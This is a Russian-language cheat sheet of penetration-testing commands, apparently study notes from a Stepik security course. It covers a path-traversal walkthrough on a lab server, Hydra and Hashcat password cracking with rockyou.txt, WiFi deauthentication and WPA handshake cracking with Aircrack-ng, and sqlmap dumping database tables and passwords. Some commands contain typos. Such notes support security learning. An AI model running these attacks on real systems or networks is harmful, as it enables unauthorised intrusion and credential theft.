nslookup
Установка
apt-get install nslookup
Узнать IP
nslookup site.ru
Для определения MX-записей введите команду:
nslookup –type=MX site.ru
Определение NS-серверов:
nslookup –type=ns site.ru
Для определения SOA-записи введите команду:
nslookup –type=SOA site.ru
Как изменить интервал ожидания
nslookup –timeout=10 site.ru
Где:
10 ― это количество секунд, за которое должен прийти ответ,
site.ru ― нужное доменное имя.
Dig
dig zonetransfer.me @nsztm2.digi.ninja axfr
whois
whois stepik.org|grep @
Поиск текстовых документов на сайте
site:stepik.org filetype:txt
Сканирование портов
nmap -A demo.seclab.stepic.org
nmap -Pn demo.seclab.stepic.org
snap install zaproxy --classic
https://www.zaproxy.org/docs/docker/
host
host stepik.org
Загрузка страницы
wget -O - https://stepik.org
curl https://stepik.org
Обход 403
0) Мы также знаем, что на сервере лежит ключ по ссылке http://enter.seclab.stepic.org/keys/key.txt
нам важна часть keys/key.txt
1) Переходим http://enter.seclab.stepic.org/getpage.php?page=pluto.tmpl
2) Начинаем ходить по директориям, используя боевые ../ http://enter.seclab.stepic.org/getpage.php?page=../pluto.tmpl
НАС ПРЕДУПРЕЖДАЮТ:
Warning: require_once(go/templates/../pluto.tmpl): failed to open stream: No such file or directory in /opt/www/enter/getpage.php on line 10
Fatal error: require_once(): Failed opening required 'go/templates/../pluto.tmpl' (include_path='.:/usr/share/php:/usr/share/pear') in /opt/www/enter/getpage.php on line 10
3) Изменяем "файл" pluto.tmpl на keys/key.txt
4) Поднимаемся ещё на уровень ../../keys/key.txt
5) Enter the void!
Закодирование текста в строке и декодирование
Base64
Base64 -D
Hydra
hydra -l ЛОГИН|-L ФАЙЛ] -p ПАРОЛЬ-P ФАЙЛ | [-C ФАЙЛ]] [-e nsr] [-o ФАЙЛ] [-t ЗАДАЧИ] [-M ФАЙЛ [-T ЗАДАЧИ]] [-w ВРЕМЯ] [-W ВРЕМЯ] [-f] [-s ПОРТ] [-x МИН:МАКС:НАБОРЫ СИМВОЛОВ] [-SOuvVd46] [service://server[:ПОРТ][/OPT]]
Опции:
-S выполнить SSL соединение
-s ПОРТ если служба не на порту по умолчанию, то можно задать порт здесь
-l ЛОГИН или -L ФАЙЛ с ЛОГИНАМИ (именами), или загрузить несколько логинов из ФАЙЛА
-p ПАРОЛЬ или -P ФАЙЛ с паролями для перебора, или загрузить несколько паролей из ФАЙЛА
-x МИНИМУМ:МАКСИМУМ:НАБОР_СИМВОЛОВ генерация паролей для брутфорса, наберите "-x -h" для помощи
-e nsr "n" — пробовать с пустым паролем, "s" — логин в качестве пароля и/или "r" — реверс учётных данных
-C ФАЙЛ формат где "логин:пароль" разделены двоеточиями, вместо опции -L/-P
-o ФАЙЛ записывать найденные пары логин/пароль в ФАЙЛ вместо стандартного вывода
sudo hydra -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt 192.168.0.107 -s 8000 http-post-form "/sql/sql_1.php:login_2=^USER#&password_2=^PASS^&post_2=post_2:not found"
Anonsurf
AnonSurf — скрипт для включения службы Tor и перенаправления трафика (в том числе DNS запросов), через анонимную распределенную сеть Tor.
mkdir Anonsurf && cd Anonsurf
git clone https://github.com/Und3rf10w/kali-anonsurf.git
sudo ./installer.sh
sudo anonsurf
anonsurf start
Hashcat
hashcat -m 0 -a 0 -o cracked.txt target_hashes.txt /usr/share/wordlists/rockyou.txt
-m 0 обозначает тип хеша, который мы взламываем (MD5).
-a 0 обозначает атаку по словарю.
-o cracked.txt — указываем выходной файл для взломанных паролей.
target_hashes.txt — наш входной файл хэшей, которые необходимо взломать.
/usr/share/wordlists/rockyou.txt — это абсолютный путь к файлу списка слов для этой атаки по словарю.
echo -n “Password” | md5sum | tr -d ” -” >> target_hashes.txt
hashcat -m 0 -a 0 -o cracked.txt target_hashes.txt /usr/share/wordlists/rockyou.txt
NMap
nmap -v -T5 -p 0-65535 -A 192.168.0.110 -oA meta -sV -o
Aircrack-ng
Просмотреть список адаптеров
ifconfig
Необходимо перевести WiFi-адпатер в режим монитора.
sudo airmon-ng start wln0
sudo kill [pid]
Запустите airodump-ng для отображения всех сетей Wi-Fi.
sudo airdump-ng wln0
Команда помимо прочего отобразит BSSID (мак-адрес), мощность сигнала (PWR) и CH (канал сети).
Скопируйте BSSID и CH целевой сети.
sudo airodump-ng -c 11 --bssid A6:0C:ID:ID:ID:ID -w filename wln0mon
Запустите деаутентификации клиентов выбранной сети в новом терминале:
sudo aireplay-ng -0 1 -a WIFI:BSSID -c DEVICE:BSSID wln0mon
Вернитесь к предыдущему окну консоли, в котором появится сообщение о перехвате рукопожатие WPA.
Чтобы остановить процесс, нажмите сочетание клавиш CTRL + C.
Теперь у нас есть файл filename.cap. Мы можем либо использовать aircrack-ng для взлома пароля, либо конвертировать filename.cap в hash.hc22000, а затем взломать хэш с помощью hashcat.
Для взлома с помощью aircrack-ng используйте следующую команду.
aircrack-ng -w rockyou.txt -b BSSID filename.cap
Атака по словарю (список слов) с использованием популярного словаря rockyou.txt
Брутфорс с использованием hashcat:
hashcat -m 22000 hash.hc22000 rockyou.txt
hahscat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d
Приведенная выше команда предназначена для перебора 8-значного числового пароля.
SQLMap
sqlmap -u "http://192.168.0.107:8000/?id=1&send=Submit" --risk=2 --level=2 -dbs
sqlmap -u "http://192.168.0.107:8000/?id=1&send=Submit" --risk=2 --level=2 -D homestead --tables
sqlmap -u "http://192.168.0.107:8000/?id=1&send=Submit" --risk=2 --level=2 -D homestead -T tab1 --dump
sqlmap -u "http://192.168.0.107:8000/?id=1&send=Submit" --risk=2 --level=2 -D homestead -T tab1 --columns
sqlmap -u "http://192.168.0.107:8000/?id=1&send=Submit" --risk=2 --level=2 -D homestead -T tab1 --passwords
sqlmap -u "http://192.168.0.107:8000" --data="login=user&password=user&send=Submit" --risk=2 --level=2 --dbs
Авторизация с ssh
ssh-keygen -t rsa -b 2048
ssh-copy-id username@remote_host
ssh -i /path/to/private/key username@remote_host